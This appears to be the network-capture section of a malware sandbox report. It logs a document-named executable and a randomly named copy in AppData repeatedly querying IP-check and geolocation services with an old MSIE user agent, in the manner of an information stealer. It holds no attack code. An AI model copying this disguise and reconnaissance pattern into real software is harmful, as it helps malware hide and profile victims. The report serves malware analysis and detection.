Aug 29, 2024 12:16:16.159588099 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:16 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0c3df42ddfa66df7b6b1c3bcf5ae355f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Aug 29, 2024 12:16:16.165649891 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 29, 2024 12:16:16.679012060 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:16 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 93f8c8aa79c79cd4487802d4a10ab790 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Aug 29, 2024 12:16:17.495058060 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 29, 2024 12:16:18.118598938 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: abf6e85b6af43269d4ca1b720b502d9d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49711	193.122.6.168	80	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:18.560513020 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:20.466684103 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fe8f6acb9d67ef00ff0e1bf2cc60b849 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Aug 29, 2024 12:16:20.489833117 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 29, 2024 12:16:22.815336943 CEST	730	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 29 Aug 2024 10:16:22 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 966cf5caac292e74ae7fec02e54a00cf Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 29, 2024 12:16:22.828527927 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 29, 2024 12:16:24.217804909 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f6f790d5bd056b5b568526aa2c61b09e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Aug 29, 2024 12:16:24.891705990 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 29, 2024 12:16:25.077893972 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee56d457e41ff5196e9affc01d78f312 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49712	193.122.6.168	80	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:18.752340078 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 29, 2024 12:16:21.342185974 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5d3e5ded260236daf0c365a79d571e0e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49714	193.122.6.168	80	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:21.974529982 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:23.376174927 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d24022b95049733b773428aa42a35caa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49716	193.122.6.168	80	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:24.159569025 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:26.261574984 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4306108d475c4fcf4261ddc2bf806528 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49719	193.122.6.168	80	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:25.695883989 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 29, 2024 12:16:26.333369970 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:26 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ccae17a39b21a2446c77fc20243022aa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49722	193.122.6.168	80	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:27.206661940 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:28.813514948 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1c7a59a2ed37f214d19094eb4032a3cf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49723	193.122.6.168	80	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:27.225986958 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Aug 29, 2024 12:16:28.651659012 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2e11663cb27af9a8604b3957e7fec16b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49728	193.122.6.168	80	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:29.403533936 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:31.033838034 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 242aa98ec8612e1154ea9c08ab187eb4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49729	193.122.6.168	80	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:29.476536036 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:30.101130962 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:30 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bfff248817b7f5e9d09006d16e2a34bf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49734	193.122.6.168	80	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:30.732157946 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:31.357146978 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 336c70687836e298205749249e26209c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49737	193.122.6.168	80	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:31.662296057 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:32.549835920 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 38c30e808534174e33ccb36906203f91 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49738	193.122.6.168	80	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:31.980546951 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:32.630202055 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 930a613bc4e929580f5e17705fb7754a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49741	193.122.6.168	80	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:33.189429998 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:33.834775925 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:33 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 11121071a7102f9e51506116cb18ce4e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49744	193.122.6.168	80	4268	C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:16:34.461662054 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Aug 29, 2024 12:16:35.112150908 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:35 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 606670280e472405c24fdd47e3521372 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49707	188.114.97.3	443	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:16:17 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-08-29 10:16:17 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:16:17 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 25160 Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xOyjbHZlrcDiNuylwms071IqSEGJ9jUIl0XnphUZQ%2BgazZ3H93qp0nRPn6V7VMaRc636XAnaahGEHXydva589h7ydZHyE6zckfqPUrQwnzwCzZtZJd6Z98T2%2BcfGfP4Xcn9xqFdc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8babc8e4b85c0f95-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 10:16:17 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-08-29 10:16:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49710	188.114.97.3	443	4820	C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Timestamp	Bytes transferred	Direction	Data
